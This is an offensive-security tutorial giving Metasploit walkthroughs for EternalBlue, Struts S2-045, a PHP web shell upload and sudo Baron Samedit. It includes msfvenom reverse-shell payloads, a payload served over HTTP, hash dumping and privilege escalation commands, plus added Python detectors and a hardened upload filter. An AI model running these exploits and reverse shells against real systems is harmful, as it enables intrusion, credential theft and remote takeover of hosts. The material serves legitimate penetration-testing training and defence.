06. Metasploit More Examples

1. Exploiting a Windows SMB Vulnerability (MS17-010 - EternalBlue)

Scenario:

Target: Windows 7 SP1 (x64) exposing SMBv1 on TCP/445 without the MS17-010 patch. EternalBlue corrupts memory in the SMBv1 kernel driver, so a failed attempt can crash the host; confirm the target is actually vulnerable first with the non-destructive check in auxiliary/scanner/smb/smb_ms17_010.

Steps:

  1. Search for Exploit:

    search eternalblue
    
  2. Load the Exploit:

    use exploit/windows/smb/ms17_010_eternalblue
    
  3. Set Target Options:

    set RHOSTS 192.168.1.100   # Target IP (RHOSTS is the option name; RHOST is accepted as an alias)
    set RPORT 445              # Default SMB port
    
  4. Set Payload: The module only supports x64 targets and therefore needs an x64 payload; the 32-bit windows/meterpreter/reverse_tcp is not accepted for it. Use a reverse Meterpreter shell:

    set payload windows/x64/meterpreter/reverse_tcp
    set LHOST 192.168.1.10     # Your attacking machine IP
    set LPORT 4444             # Listening port
    
  5. Exploit:

    exploit
    
  6. Post-Exploitation:

    • Interact with Meterpreter:

      sessions -i 1  # Assuming session ID is 1
      
    • Gather system info:

      sysinfo
      
    • Dump hashes: hashdump reads the local SAM and needs SYSTEM privileges. EternalBlue hands back a session running as NT AUTHORITY\SYSTEM, which getuid confirms; in a session with lower privileges the command fails.

      hashdump
      

2. Customizing Payloads

Metasploit provides flexibility to generate and modify payloads for various scenarios. msfvenom generates the payload and msfconsole's exploit/multi/handler catches the connection; the two must agree on the payload name, LHOST and LPORT.

Reverse Shell with Payload Encoding

  1. Generate a Reverse Shell Payload:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -o shell.exe
    
  2. Encode the Payload: Encoders exist to remove bad characters (null bytes, newlines) from shellcode; they are not an anti-virus bypass. x86/shikata_ga_nai is one of the most heavily signatured encoders and stacking iterations does not change that, so expect a current endpoint product to flag encoded_shell.exe.

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 3 -o encoded_shell.exe
    
    • -e x86/shikata_ga_nai: Encoding mechanism. It emits x86 code, so it only fits x86 payloads; a windows/x64/* payload needs an x64 encoder (msfvenom --list encoders shows them).
    • -i 3: Number of iterations to apply encoding.
    
  3. Serve the Payload: Use a simple HTTP server to host the payload:

    python3 -m http.server 8080
    
  4. Start the Listener: Run exploit/multi/handler with the same payload, LHOST and LPORT used at generation time (the listener set-up in section 4 shows the commands). A staged payload such as meterpreter/reverse_tcp needs a handler configured with that same staged payload, not its stageless meterpreter_reverse_tcp sibling.

  5. Execute on Target: Download and run encoded_shell.exe on the target; the session appears in the handler.


3. Exploiting Apache Struts CVE-2017-5638

Scenario:

Target: An Apache Struts 2 application (2.3.5 through 2.3.31, or 2.5 through 2.5.10) using the Jakarta Multipart parser. The flaw (S2-045) is an OGNL injection: a malformed Content-Type header is echoed into an error message that Struts evaluates as an expression, so the attack is a single unauthenticated HTTP request.

Steps:

  1. Search for Exploit:

    search struts2
    
  2. Load the Exploit:

    use exploit/multi/http/struts2_content_type_ognl
    
  3. Set Target Options:

    set RHOSTS 192.168.1.200   # Target server IP
    set RPORT 8080             # Port Apache Struts is running on
    set TARGETURI /struts2-showcase/index.action   # Any URI routed to a Struts action; the showcase path is the module default
    
  4. Set Payload: The module drops a native executable into the server's temp directory (or runs a cmd/* payload), so pick a payload for the server's operating system and architecture rather than a Java one, and confirm it is listed by show payloads:

    set payload linux/x64/meterpreter/reverse_tcp
    set LHOST 192.168.1.10
    set LPORT 4444
    
  5. Run Exploit:

    exploit
    
  6. Post-Exploitation:

    • Check the current user: the session runs as the account that owns the Java/Tomcat process, which is normally unprivileged.

      getuid
      
    • Elevate privileges: getsystem only works against Windows targets (it relies on Windows token manipulation and named-pipe impersonation). On a Linux server run post/multi/recon/local_exploit_suggester against the session and pick a matching exploit/linux/local module instead.

      getsystem
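
From the defender's side, the request this module sends is easy to recognise: the OGNL expression travels in the Content-Type header of an otherwise ordinary POST (the S2-046 variant of the same CVE moves it into a multipart part's Content-Disposition, which a header-only check like this one does not cover). The detector below is an added example, not part of the page or of the Metasploit module; the request heads it scans are constructed here, and the probe expression is an inert canary of the kind vulnerability scanners send, not a command-execution payload.

```python
"""Flag HTTP request heads whose Content-Type carries an OGNL expression, the
S2-045 vector of CVE-2017-5638. Added detection example, not Metasploit code."""
import re

# OGNL expression openers plus helpers that nearly every public S2-045 probe touches
OGNL_MARKERS = re.compile(
    r"%\{|\$\{|#_memberAccess|ognl\.OgnlContext|#context\[|\bProcessBuilder\b",
    re.IGNORECASE,
)


def parse_request_head(raw):
    """Split a raw HTTP request head into (request line, {lowercase name: value})."""
    lines = raw.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if not line:  # the empty line terminates the head
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def is_struts_ognl_attempt(raw):
    """True when the Content-Type header holds an OGNL expression. Header names
    are matched case-insensitively, which is how the server treats them too."""
    _, headers = parse_request_head(raw)
    value = headers.get("content-type", "")
    return bool(value) and OGNL_MARKERS.search(value) is not None


def triage(samples):
    """Names of the samples that look like S2-045 attempts, in input order."""
    return [name for name, raw in samples.items() if is_struts_ognl_attempt(raw)]


# Constructed sample request heads (not captured traffic). The probe expression
# only adds a response header, the canary form used by vulnerability scanners.
CANARY = ("%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']"
          ".addHeader('X-Check','1')}")
SAMPLES = {
    "benign_upload": (
        "POST /struts2-showcase/fileupload/doUpload.action HTTP/1.1\r\n"
        "Host: 192.168.1.200:8080\r\n"
        "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW\r\n"
        "Content-Length: 512\r\n\r\n"
    ),
    "benign_form": (
        "POST /struts2-showcase/index.action HTTP/1.1\r\n"
        "Host: 192.168.1.200:8080\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    ),
    "s2045_probe": (
        "POST /struts2-showcase/index.action HTTP/1.1\r\n"
        "Host: 192.168.1.200:8080\r\n"
        f"Content-Type: {CANARY}\r\n\r\n"
    ),
    "mixed_case_header": (
        "POST /struts2-showcase/index.action HTTP/1.1\r\n"
        "Host: 192.168.1.200:8080\r\n"
        "CONTENT-TYPE: ${#context['x']}\r\n\r\n"
    ),
}

if __name__ == "__main__":
    print(triage(SAMPLES))  # ['s2045_probe', 'mixed_case_header']
```

A benign multipart boundary never contains %{ or ${, so the rule has a low false-positive rate on real traffic; the same regex applied to the first lines of each multipart part extends it to the S2-046 vector.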
      

4. Custom Exploit: PHP Web Shell Injection

Scenario:

The target web application lets you upload files that land under its document root and are served through the PHP interpreter, and its upload check trusts the file name or the client-supplied Content-Type instead of inspecting the content.

Steps:

  1. Generate a PHP Reverse Shell:

    msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f raw > shell.php
    
  2. Rename Payload: Rename shell.php to something that blends in with the environment, e.g. image.php. The file must keep an extension the server executes as PHP (such as .php or .phtml): the name only fools a human reviewer, not the interpreter, and an upload filter that checks the final extension properly rejects it whatever it is called.

  3. Set Up the Metasploit Listener: Use the same payload, LHOST and LPORT as the msfvenom command. A handler with a different payload string (for example the staged php/meterpreter/reverse_tcp) accepts the connection but never produces a session.

    use exploit/multi/handler
    set payload php/meterpreter_reverse_tcp
    set LHOST 192.168.1.10
    set LPORT 4444
    exploit
    
  4. Upload the Payload: Use the vulnerable file upload mechanism to upload image.php and note the path the application stores it under.

  5. Trigger the Payload: Request the uploaded PHP file in a browser (or with curl); the server executes it and the handler reports a new session:

    http://192.168.1.200/uploads/image.php
    
  6. Post-Exploitation: The PHP Meterpreter runs as the web server account (www-data or similar); drop to a system shell with the shell command for the following steps.

    • Enumerate local users: /etc/passwd lists accounts but holds no credentials; the password hashes are in /etc/shadow, which the web server account normally cannot read.

      cat /etc/passwd
      
    • Escalate privileges: list what the current user may run through sudo. The web server account rarely has sudo rights at all, and sudo -l prompts for a password unless a NOPASSWD rule exists, so an empty or password-gated answer is the cue to look at SUID binaries, writable cron jobs and local exploit modules instead.

      sudo -l
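
The upload mechanism this section relies on is usually a filter that believes what the client says about the file. The two functions below are an added example with a hypothetical application, upload directory and file names (nothing from the page or from a real project): the filter that lets image.php through sits next to one that decides from the bytes and stores the file under a server-chosen name.

```python
"""Vulnerable vs hardened upload filter. Added example with a hypothetical
application, upload directory and file names; not from the page or a real project."""
import os
import secrets

ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
# Leading bytes a file of each allowed type must start with
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def vulnerable_accept(filename, client_content_type):
    """The filter the scenario relies on: it believes the Content-Type the client
    sent, so image.php declared as image/png passes (curl -F 'f=@image.php;type=image/png'),
    and the application then stores it under the web root with its executable name."""
    return client_content_type.startswith("image/")


def hardened_accept(filename, data, upload_dir):
    """Decide from the bytes, not from the client. Returns the path to store the
    file under, or None to reject.

    - only the final extension counts and it must be allowlisted, so image.php
      is refused outright;
    - the first bytes must match the magic number for that extension, so a PHP
      file renamed to image.png is refused as well;
    - the stored name is server-chosen: no path traversal, and a double
      extension such as image.php.png becomes <random>.png, so the .php in the
      middle never reaches the interpreter (Apache's multiple-extension handling
      would otherwise execute it). upload_dir must lie outside the document root.
    A PNG/PHP polyglot still passes the magic check, which is why the last
    point, not the content check, is the control that actually matters.
    """
    base = os.path.basename(filename)  # strip any directory part from the name
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED_EXT:
        return None
    if not data.startswith(MAGIC[ext]):
        return None
    stored_name = f"{secrets.token_hex(16)}.{ext}"
    return os.path.join(upload_dir, stored_name)


if __name__ == "__main__":
    # Constructed stand-ins for the uploaded bytes
    PHP_FILE = b"<?php /* stand-in for the msfvenom-generated payload */ ?>"
    PNG_FILE = MAGIC["png"] + b"\x00\x00\x00\rIHDR"
    print(vulnerable_accept("image.php", "image/png"))                  # True
    print(hardened_accept("image.php", PHP_FILE, "/srv/app-uploads"))   # None
    print(hardened_accept("image.png", PHP_FILE, "/srv/app-uploads"))   # None
    print(hardened_accept("photo.png", PNG_FILE, "/srv/app-uploads"))   # /srv/app-uploads/<random>.png
```

Serving the stored files back through a handler that sets Content-Type from the allowlisted extension and X-Content-Type-Options: nosniff closes the remaining gap, since the web server then never interprets anything in upload_dir.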
      

5. Exploiting Linux System with a Local Privilege Escalation

Scenario:

Exploit CVE-2021-3156 (Baron Samedit), a heap-based buffer overflow in sudo's command-line argument handling that lets any local user become root. Affected: sudo 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1. You already hold an unprivileged Meterpreter session on the host.

Steps:

  1. Search and Load Exploit:

    search sudo
    use exploit/linux/local/sudo_baron_samedit
    
  2. Set Target Details: SESSION is the ID of the existing low-privilege session on the host (sessions -l lists them).

    set SESSION 1     # Use active session ID
    
  3. Run Exploit: Run check first so the module tests the target before anything is attempted. Distributions backport the fix without changing the version string, so a version number on its own is not proof of vulnerability.

    exploit
    
  4. Verify Privilege Escalation: Check user privileges in the new session; a successful run shows uid=0(root).

    id
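
Before spending an exploit attempt, the host can be triaged from two commands run in the existing session: sudo --version and the non-destructive sudoedit -s / test from the Qualys advisory. The helper below is an added example, not part of the page or of the Metasploit module; the command outputs it parses are constructed samples, so run the two commands on the target and feed it their real output.

```python
"""Triage a host for CVE-2021-3156 (Baron Samedit) from `sudo --version` and the
non-destructive `sudoedit -s /` test. Added example; sample outputs are constructed."""
import re

# Affected ranges from the advisory: legacy 1.8.2..1.8.31p2, stable 1.9.0..1.9.5p1
AFFECTED = [((1, 8, 2, 0), (1, 8, 31, 2)), ((1, 9, 0, 0), (1, 9, 5, 1))]


def parse_sudo_version(text):
    """'Sudo version 1.8.31p2' -> (1, 8, 31, 2); a missing pN level counts as 0."""
    m = re.search(r"[Ss]udo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", text)
    if not m:
        return None
    major, minor, micro, patch = m.groups()
    return int(major), int(minor), int(micro), int(patch or 0)


def version_in_affected_range(version):
    """True when the parsed version falls inside one of the advisory's ranges."""
    return any(low <= version <= high for low, high in AFFECTED)


def classify_sudoedit_output(text):
    """The overflow is reachable when sudoedit is invoked with -s (shell mode).
    A vulnerable build gets as far as complaining about the path; a patched one
    rejects the flag combination and prints its usage text."""
    text = text.strip()
    if "not a regular file" in text:
        return "vulnerable"
    if text.startswith("usage:"):
        return "patched"
    return "unknown"


def worth_attempting(version_output, sudoedit_output):
    """True when the exploit is worth running. The sudoedit probe is authoritative:
    distributions backport the fix without changing the version string (Ubuntu's
    1.8.31-1ubuntu1.2 is patched yet still reports 1.8.31), so the version is
    consulted only when the probe is inconclusive, e.g. sudoedit is missing."""
    verdict = classify_sudoedit_output(sudoedit_output)
    if verdict != "unknown":
        return verdict == "vulnerable"
    version = parse_sudo_version(version_output)
    return version is not None and version_in_affected_range(version)


# Constructed sample outputs, not captured from a real host
VULNERABLE_HOST = (
    "Sudo version 1.8.31\nSudoers policy plugin version 1.8.31\n",
    "sudoedit: /: not a regular file\n",
)
BACKPORTED_FIX = (
    "Sudo version 1.8.31\nSudoers policy plugin version 1.8.31\n",
    "usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-D directory] "
    "[-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ...\n",
)

if __name__ == "__main__":
    print(worth_attempting(*VULNERABLE_HOST), worth_attempting(*BACKPORTED_FIX))  # True False
```

The same two commands make a good detection-side check: a fleet-wide run of sudoedit -s / that returns "not a regular file" on a host is a patch gap, independent of what the package version claims.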